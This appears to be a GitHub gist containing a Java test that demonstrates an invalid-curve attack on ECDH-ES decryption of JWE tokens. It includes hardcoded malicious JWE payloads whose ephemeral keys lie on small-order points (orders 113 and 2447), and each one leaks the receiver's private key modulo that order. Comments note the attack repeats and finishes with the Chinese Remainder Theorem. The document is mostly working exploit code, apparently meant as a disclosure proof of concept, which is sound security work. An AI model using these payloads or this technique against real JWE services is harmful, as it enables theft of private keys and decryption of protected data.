| private static ECKey generateECJWK(final ECKey.Curve curve) | |
| throws Exception { | |
| final ECParameterSpec ecParameterSpec = curve.toECParameterSpec(); | |
| KeyPairGenerator generator = KeyPairGenerator.getInstance("EC"); | |
| generator.initialize(ecParameterSpec); | |
| KeyPair keyPair = generator.generateKeyPair(); | |
| final ECPrivateKey privateKey = (ECPrivateKey) keyPair.getPrivate(); | |
| ECPrivateKey pk = new ECPrivateKey() { | |
| BigInteger bi = new BigInteger( | |
| "38124166010662753100689735609285807169841714722622367731519061366402702420444"); | |
| @Override | |
| public ECParameterSpec getParams() { | |
| return ecParameterSpec; | |
| } | |
| @Override | |
| public String getFormat() { | |
| return privateKey.getFormat(); | |
| } | |
| @Override | |
| public byte[] getEncoded() { | |
| return bi.toByteArray(); | |
| } | |
| @Override | |
| public String getAlgorithm() { | |
| return privateKey.getAlgorithm(); | |
| } | |
| @Override | |
| public BigInteger getS() { | |
| return bi; | |
| } | |
| }; | |
| return new ECKey.Builder(curve, (ECPublicKey) keyPair.getPublic()) | |
| .privateKey(pk).build(); | |
| } | |
| public void testCycle_ECDH_ES_Curve_P256() throws Exception { | |
| ECKey ecJWK = generateECJWK(ECKey.Curve.P_256); | |
| BigInteger privateReceiverKEy = ecJWK.toECPrivateKey().getS(); | |
| JWEHeader header = new JWEHeader.Builder(JWEAlgorithm.ECDH_ES, | |
| EncryptionMethod.A128GCM) | |
| .agreementPartyUInfo(Base64URL.encode("Alice")) | |
| .agreementPartyVInfo(Base64URL.encode("Bob")).build(); | |
| // ========================= attacking point #1 with order 113 | |
| // ====================== | |
| BigInteger attackerOrderGroup1 = new BigInteger("113"); | |
| BigInteger receiverPrivateKeyModAttackerOrderGroup1 = privateReceiverKEy | |
| .mod(attackerOrderGroup1); | |
| System.out.println("The receiver private key is equal to " | |
| + receiverPrivateKeyModAttackerOrderGroup1 + " mod " | |
| + attackerOrderGroup1); | |
| // The malicious JWE contains a public key with order 113 | |
| String maliciousJWE1 = "eyJhbGciOiJFQ0RILUVTK0ExMjhLVyIsImVuYyI6IkExMjhDQkMtSFMyNTYiLCJlcGsiOnsia3R5IjoiRUMiLCJ4IjoiZ1RsaTY1ZVRRN3otQmgxNDdmZjhLM203azJVaURpRzJMcFlrV0FhRkpDYyIsInkiOiJjTEFuakthNGJ6akQ3REpWUHdhOUVQclJ6TUc3ck9OZ3NpVUQta2YzMEZzIiwiY3J2IjoiUC0yNTYifX0.qGAdxtEnrV_3zbIxU2ZKrMWcejNltjA_dtefBFnRh9A2z9cNIqYRWg.pEA5kX304PMCOmFSKX_cEg.a9fwUrx2JXi1OnWEMOmZhXd94-bEGCH9xxRwqcGuG2AMo-AwHoljdsH5C_kcTqlXS5p51OB1tvgQcMwB5rpTxg.72CHiYFecyDvuUa43KKT6w"; | |
| JWEObject jweObject1 = JWEObject.parse(maliciousJWE1); | |
| ECDHDecrypter decrypter = new ECDHDecrypter(ecJWK.toECPrivateKey()); | |
| decrypter.getJCAContext().setContentEncryptionProvider( | |
| BouncyCastleProviderSingleton.getInstance()); | |
| jweObject1.decrypt(decrypter); | |
| // this proof that receiverPrivateKey is equals 26 % 113 | |
| assertEquals("Gambling is illegal at Bushwood sir, and I never slice.", | |
| jweObject1.getPayload().toString()); | |
| // ========================= attacking point #2 with order 2447 | |
| // ====================== | |
| BigInteger attackerOrderGroup2 = new BigInteger("2447"); | |
| BigInteger receiverPrivateKeyModAttackerOrderGroup2 = privateReceiverKEy | |
| .mod(attackerOrderGroup2); | |
| System.out.println("The receiver private key is equal to " | |
| + receiverPrivateKeyModAttackerOrderGroup2 + " mod " | |
| + attackerOrderGroup2); | |
| // The malicious JWE contains a public key with order 2447 | |
| String maliciousJWE2 = "eyJhbGciOiJFQ0RILUVTK0ExMjhLVyIsImVuYyI6IkExMjhDQkMtSFMyNTYiLCJlcGsiOnsia3R5IjoiRUMiLCJ4IjoiWE9YR1E5XzZRQ3ZCZzN1OHZDSS1VZEJ2SUNBRWNOTkJyZnFkN3RHN29RNCIsInkiOiJoUW9XTm90bk56S2x3aUNuZUprTElxRG5UTnc3SXNkQkM1M1ZVcVZqVkpjIiwiY3J2IjoiUC0yNTYifX0.UGb3hX3ePAvtFB9TCdWsNkFTv9QWxSr3MpYNiSBdW630uRXRBT3sxw.6VpU84oMob16DxOR98YTRw.y1UslvtkoWdl9HpugfP0rSAkTw1xhm_LbK1iRXzGdpYqNwIG5VU33UBpKAtKFBoA1Kk_sYtfnHYAvn-aes4FTg.UZPN8h7FcvA5MIOq-Pkj8A"; | |
| JWEObject jweObject2 = JWEObject.parse(maliciousJWE2); | |
| decrypter.getJCAContext().setContentEncryptionProvider( | |
| BouncyCastleProviderSingleton.getInstance()); | |
| jweObject2.decrypt(decrypter); | |
| // this proof that receiverPrivateKey is equals 2446 % 2447 | |
| assertEquals("Gambling is illegal at Bushwood sir, and I never slice.", | |
| jweObject2.getPayload().toString()); | |
| // THIS CAN BE DOIN MANY TIME | |
| // .... | |
| // AND THAN CHINESE REMAINDER THEOREM FTW | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment